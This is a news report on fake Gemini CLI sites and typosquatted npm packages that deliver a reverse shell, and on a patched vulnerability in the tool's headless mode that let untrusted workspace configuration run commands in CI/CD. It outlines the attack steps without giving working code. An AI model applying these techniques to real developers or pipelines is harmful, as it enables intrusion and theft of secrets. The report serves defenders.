The Dark Side of Gemini CLI: Malware and Vulnerabilities

NordVPN disclosed on April 29 that it had uncovered campaigns targeting developers and tech-savvy users through fake websites, cloned repositories, and deceptive social media posts designed to mimic the official Gemini CLI. Instead of delivering legitimate software, the campaigns distribute a reverse shell that gives attackers complete remote control over compromised machines.

On macOS, the attack begins with a convincing clone of the official Gemini CLI page that instructs users to run a Base64-encoded terminal command. Once decoded, the command downloads a malicious script and runs it with the highest administrative privileges, enabling the attacker to read, modify, or delete any file on the device. The Windows variant uses a PowerShell command disguised with variable names like "$Install='GeminiCLI'" to execute malicious code directly in memory — a "fileless" technique specifically designed to evade traditional antivirus software.

NordVPN researchers also identified a typosquatting operation targeting the npm package registry, where fake package names including "gemini/cli" and "gemini-cli" were registered to mimic the official "google/gemini-cli" package. Though the fake packages had not yet appeared in the npm registry at the time of analysis, their preparation signals an imminent threat.

In a separate but related concern, Google patched a CVSS 10.0 vulnerability in Gemini CLI that allowed unprivileged attackers to execute arbitrary commands on host systems. Discovered by Novee Security, the flaw stemmed from how the tool's headless mode — commonly used in CI/CD pipelines and GitHub Actions workflows — automatically trusted workspace folders for loading configuration files without review or sandboxing.

"Code execution on the host running the agent gave an unprivileged outsider access to whatever secrets, credentials, and source code the workflow could reach," the Novee team explained. "Enough for token theft, supply-chain pivots, and lateral movement into downstream systems."

The fix shipped in Gemini CLI versions 0.39.1 and 0.40.0-preview.3, but Google warned that organizations using the run-gemini-cli GitHub Action without pinning a specific version may need to update their workflows, as the patch changes how workspace trust and the "--yolo" mode function.

The twin developments underscore growing risks in the AI-powered developer tool ecosystem. NordVPN urged developers to download tools only from official sources and never to run terminal commands copied from unfamiliar websites. Google, meanwhile, advised teams to validate inputs, enforce least privilege, and update their CI/CD configurations to use explicit trust mechanisms.

"AI coding agents now sit inside CI/CD pipelines holding the execution privileges of a trusted contributor," Novee researchers warned. "This level of access can lead to critical supply-chain attacks, the type that stem from the developer workflow itself."